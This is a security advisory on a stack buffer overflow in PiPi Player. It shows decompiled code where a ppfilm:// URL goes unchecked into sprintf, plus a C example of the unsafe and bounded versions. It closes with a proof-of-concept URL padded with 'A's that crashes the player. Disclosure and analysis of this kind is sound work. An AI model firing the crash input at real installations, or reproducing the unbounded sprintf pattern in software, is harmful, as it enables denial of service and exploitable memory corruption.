PiPi Player (皮皮播放器) Buffer Overflow Vulnerability

Brief description:

When PiPi Player handles a user-supplied URL, it does not check the URL's length, which results in a buffer overflow.

Detailed description:

When PiPi Player handles a user-supplied URL, it performs no length check on it, which results in a stack buffer overflow.

However, because the binary is compiled with /GS (stack cookies), exploitation is somewhat difficult.

case 32780:
    v9 = *(_DWORD *)(wParam + 4096);
    v22 = 0;
    v21 = v9;
    *(_DWORD *)(wParam + 6344) = 1;
    sub_40D480(v21, v22);
    v42 = 5;
    if ( CDialog::DoModal(&v31) == 1
      && ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::Find(&v32, "://", 0) > 0 )
    {
      v10 = (const char *)ATL::CSimpleStringT<char_1>::operator char_const__(&v32);
      if ( strnicmp(v10, "ppfilm://", 9u)     // check whether the first 9 characters of the input are "ppfilm://"
        && (v11 = (const char *)ATL::CSimpleStringT<char_1>::operator char_const__(&v32), strnicmp(v11, "pvod://", 7u)) )
      {
        v22 = 0;
        v21 = v12;
        v29 = &v21;
        ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>(
          &v21,
          &Default);
        v20 = v13;
        v28 = &v20;
        LOBYTE(v42) = 6;
        ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>(
          &v20,
          &Default);
        v18 = v14;
        *(_DWORD *)&Drive = &v18;
        v41 = 7;
        ATL::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>::CStringT<char_StrTraitMFC_DLL<char_ATL::ChTraitsCRT<char>>>(&v18);
        LOBYTE(v42) = 5;
        sub_4304F0(v3, v19, v20, v21, v22);
      }
      else
      {
        CommandLine = 0;
        memset(&v34, 0, 0x1FCu);
        v35 = 0;
        v36 = 0;
        sprintf(&CommandLine, "%s%s \"%s\"", dword_48AF30, "jfCacheMgr.exe", v32); // the input is passed straight to sprintf and the assembled string is stored in CommandLine
        memset(&StartupInfo, 0, sizeof(StartupInfo));
        ProcessInformation.hProcess = 0;
        ProcessInformation.hThread = 0;
        ProcessInformation.dwProcessId = 0;
        ProcessInformation.dwThreadId = 0;
        StartupInfo.cb = 68;
        CreateProcessA(0, &CommandLine, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
        if ( ProcessInformation.hThread )
          CloseHandle(ProcessInformation.hThread);
        if ( (_DWORD)ProcessInformation.hProcess )
          CloseHandle(ProcessInformation.hProcess);
      }
    }
    *(_DWORD *)(v3 + 6344) = 0;
    v42 = -1;
    result = sub_40D500(&v31);
    break;

The incoming URL is not checked at all. It is passed directly to
sprintf(&CommandLine, "%s%s \"%s\"", dword_48AF30, "jfCacheMgr.exe", v32);
which writes the URL into the fixed-size CommandLine buffer, causing the overflow.
We can see that, at the start of the function,
.text:00430C20 push ebp
.text:00430C21 mov ebp, esp
.text:00430C23 and esp, 0FFFFFFF8h
.text:00430C26 push 0FFFFFFFFh
.text:00430C28 push offset SEH_430C20
.text:00430C2D mov eax, large fs:0
.text:00430C33 push eax
.text:00430C34 mov large fs:0, esp
.text:00430C3B sub esp, 5F8h
// a total of 0x5F8 bytes of stack space is allocated for the frame.
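The defect above reduced to its essence, beside the bounded form that would have prevented it. This is an added example, not the player's own code: the buffer size CMDLINE_SIZE, the directory prefix and the function names are assumptions, chosen to mirror the 0x1FC memset and the sprintf format string in the decompiled case 32780.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size, picked to match the 0x1FC memset seen in the decompiled code. */
#define CMDLINE_SIZE 0x200

/* Shape of the original defect: sprintf into a fixed stack buffer with no
 * length check, so a URL longer than the buffer writes past its end. */
static void build_cmdline_unsafe(char *out, const char *dir, const char *url) {
    sprintf(out, "%s%s \"%s\"", dir, "jfCacheMgr.exe", url);
}

/* Hardened form: snprintf never writes beyond out_size and returns the length
 * the full string would need, so an oversized URL is rejected, not truncated. */
static int build_cmdline_safe(char *out, size_t out_size, const char *dir, const char *url) {
    int needed = snprintf(out, out_size, "%s%s \"%s\"", dir, "jfCacheMgr.exe", url);
    if (needed < 0 || (size_t)needed >= out_size) {
        out[0] = '\0';   /* leave an empty string rather than a cut-off command line */
        return -1;
    }
    return needed;       /* bytes written, excluding the terminator */
}

/* The input check the report says is missing: scheme test plus a length cap
 * (the original compares case-insensitively; strncmp is used here for portability). */
static int url_is_acceptable(const char *url, size_t max_len) {
    if (url == NULL || strlen(url) > max_len) return 0;
    return strncmp(url, "ppfilm://", 9) == 0 || strncmp(url, "pvod://", 7) == 0;
}

/* Constructed input shaped like the proof-of-concept: "ppfilm://" followed by
 * far more 'A's than the buffer can hold. Returns what the safe builder reports. */
static int demo_long_url(void) {
    char cmd[CMDLINE_SIZE];
    char long_url[CMDLINE_SIZE * 2];
    memset(long_url, 'A', sizeof long_url - 1);
    memcpy(long_url, "ppfilm://", 9);
    long_url[sizeof long_url - 1] = '\0';
    return build_cmdline_safe(cmd, sizeof cmd, "C:\\PiPi\\", long_url);
}

int main(void) {
    char cmd[CMDLINE_SIZE];
    printf("short url -> %d bytes: %s\n",
           build_cmdline_safe(cmd, sizeof cmd, "C:\\PiPi\\", "ppfilm://example"), cmd);
    printf("long url  -> %d (rejected before CreateProcessA would run)\n", demo_long_url());
    (void)build_cmdline_unsafe;   /* shown for contrast only; deliberately not called */
    return 0;
}
```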

Proof of vulnerability:

We construct the following URL:
“ppfilm://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”
